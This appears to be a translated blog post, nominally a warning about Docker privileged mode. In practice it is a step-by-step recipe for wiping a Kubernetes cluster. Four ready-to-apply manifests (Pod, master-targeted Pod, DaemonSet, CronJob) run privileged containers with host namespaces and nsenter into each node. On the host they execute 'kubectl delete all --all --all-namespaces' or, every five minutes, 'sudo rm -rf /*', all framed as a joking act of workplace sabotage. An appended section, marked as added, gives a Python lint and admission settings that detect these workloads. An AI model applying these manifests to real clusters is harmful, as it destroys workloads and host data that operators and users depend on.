This document exists mainly to show how dangerous Docker privileged mode is; proceed with caution. Users without CLI access can copy the example YAML and create the cluster workloads (Pod, Job, DaemonSet, and so on) directly.
1. Delete all resources directly
If you can log in to the machine, pack up your things and run:
```bash
kubectl delete all --all --all-namespaces
```
But you may not have that much permission; in that case, try the methods below. They all depend on Docker's privileged mode.
2. A quick warm-up
Warm up first: run the script and see whether it has any effect.
```bash
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  containers:
  - command: ["sh"]
    args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
    image: docker.io/alpine:3.12
    name: pod-test
    securityContext:
      privileged: true
  hostIPC: true
  hostNetwork: true
  hostPID: true
  tolerations:
  - effect: NoSchedule
    key: node-role.kubernetes.io/master
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
EOF
```
3. The master node may have a kubeconfig
If kubectl cannot be run from the worker nodes, try targeting the master node instead.
```bash
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - preference:
          matchExpressions:
          - key: node-role.kubernetes.io/master
            operator: In
            values:
            - ""
        weight: 100
  containers:
  - command: ["sh"]
    args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
    image: docker.io/alpine:3.12
    name: pod-test
    securityContext:
      privileged: true
  tolerations:
  - effect: NoSchedule
    key: node-role.kubernetes.io/master
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
  hostIPC: true
  hostNetwork: true
  hostPID: true
EOF
```
4. Forget it, try every node
If that still does not work, just try every node; everything is packed up anyway.
```bash
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: danger-3
spec:
  selector:
    matchLabels:
      danger.kubernetes.io/name: d3
  template:
    metadata:
      labels:
        danger.kubernetes.io/name: d3
    spec:
      containers:
      - command: ["sh"]
        args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
        image: docker.io/alpine:3.12
        name: pod-test
        securityContext:
          privileged: true
      hostIPC: true
      hostNetwork: true
      hostPID: true
      tolerations:
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoExecute
        key: node.kubernetes.io/not-ready
        operator: Exists
        tolerationSeconds: 60
      - effect: NoExecute
        key: node.kubernetes.io/unreachable
        operator: Exists
        tolerationSeconds: 60
EOF
```
5. One last attempt on a schedule, then clock out
Having got this far, tomorrow will most likely be another 996 day at the grind, so one final try.
Run it every five minutes. The basic cron format is * * * * *, where the fields are minute, hour, day of month, month and day of week.
```bash
cat <<EOF | kubectl apply -f -
apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: danger-4
spec:
  schedule: "*/5 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - command: ["sh"]
            args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"]
            image: docker.io/alpine:3.12
            name: pod-test
            securityContext:
              privileged: true
          restartPolicy: OnFailure
          hostIPC: true
          hostNetwork: true
          hostPID: true
          tolerations:
          - effect: NoSchedule
            key: node-role.kubernetes.io/master
          - key: CriticalAddonsOnly
            operator: Exists
          - effect: NoExecute
            key: node.kubernetes.io/not-ready
            operator: Exists
            tolerationSeconds: 60
          - effect: NoExecute
            key: node.kubernetes.io/unreachable
            operator: Exists
            tolerationSeconds: 60
EOF
```
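Every manifest above combines the same few settings: a privileged container, hostPID/hostNetwork/hostIPC, and tolerations for the control-plane taint. The Python below is an added example (not from the original post) of a pre-admission check a cluster operator can run over a manifest to flag exactly that combination; the function names are mine, and the sample manifests are constructed from the danger-4 CronJob shown above plus an ordinary Pod for comparison.

```python
# Added example (not from the original post): lint for the settings the danger-* workloads rely on.

def pod_spec_of(manifest):
    """Return the PodSpec of a Pod, a template-based workload, or a CronJob."""
    kind = manifest.get("kind")
    spec = manifest.get("spec", {})
    if kind == "Pod":
        return spec
    if kind == "CronJob":
        return spec["jobTemplate"]["spec"]["template"]["spec"]
    if kind in ("DaemonSet", "Deployment", "StatefulSet", "Job", "ReplicaSet"):
        return spec["template"]["spec"]
    return {}

def host_breakout_findings(manifest):
    """List node-takeover indicators in one manifest; an empty list means clean."""
    spec = pod_spec_of(manifest)
    findings = []
    for ns in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(ns) is True:
            findings.append(ns)
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged") is True:
            findings.append("privileged:" + c.get("name", "?"))
    # hostPID plus a privileged container is what lets `nsenter -t 1` reach the node.
    if "hostPID" in findings and any(f.startswith("privileged:") for f in findings):
        findings.append("nsenter-to-host-possible")
    # Tolerating the master taint lets the pod be scheduled onto control-plane nodes.
    if any(t.get("key") == "node-role.kubernetes.io/master"
           for t in spec.get("tolerations", [])):
        findings.append("tolerates-master-taint")
    return findings

# Constructed from the danger-4 CronJob manifest above (fields not relevant to the
# check omitted); BASELINE is an ordinary unprivileged Pod used as the clean comparison.
CRONJOB = {
    "kind": "CronJob",
    "spec": {"jobTemplate": {"spec": {"template": {"spec": {
        "hostPID": True, "hostNetwork": True, "hostIPC": True,
        "containers": [{"name": "pod-test", "securityContext": {"privileged": True}}],
        "tolerations": [{"key": "node-role.kubernetes.io/master", "effect": "NoSchedule"}],
    }}}}},
}
BASELINE = {"kind": "Pod", "spec": {"containers": [{"name": "web"}]}}

if __name__ == "__main__":
    for name, m in (("danger-4", CRONJOB), ("baseline", BASELINE)):
        print(name, host_breakout_findings(m) or "clean")
```

In a live cluster the same settings are rejected before scheduling by Pod Security Admission once a namespace carries the label pod-security.kubernetes.io/enforce=baseline, which forbids privileged containers and host namespaces.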
6. References